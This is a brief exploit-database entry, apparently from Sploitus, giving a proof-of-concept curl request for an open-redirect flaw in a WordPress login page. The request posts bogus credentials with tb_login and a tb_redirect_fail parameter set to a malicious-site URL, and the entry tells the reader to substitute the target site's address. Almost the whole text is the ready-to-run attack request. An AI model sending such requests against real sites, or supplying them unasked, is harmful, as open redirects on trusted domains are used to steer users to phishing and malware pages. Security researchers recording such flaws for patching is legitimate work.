Share
## https://sploitus.com/exploit?id=WPEX-ID:D130A60C-C36B-4994-9B0E-E52CD7F99387
curl -kvL https://www.example.com/wp-login.php \
     -e http://arbitrary-referer \
     -d "log=invalid_username&pwd=invalid_password&tb_login=1&tb_redirect_fail=https://malicious-site.com"


- `https://www.example.com` should be replaced with the affected WordPress site URL.
- The request triggers a 302 redirect to the URL specified in `tb_redirect_fail`.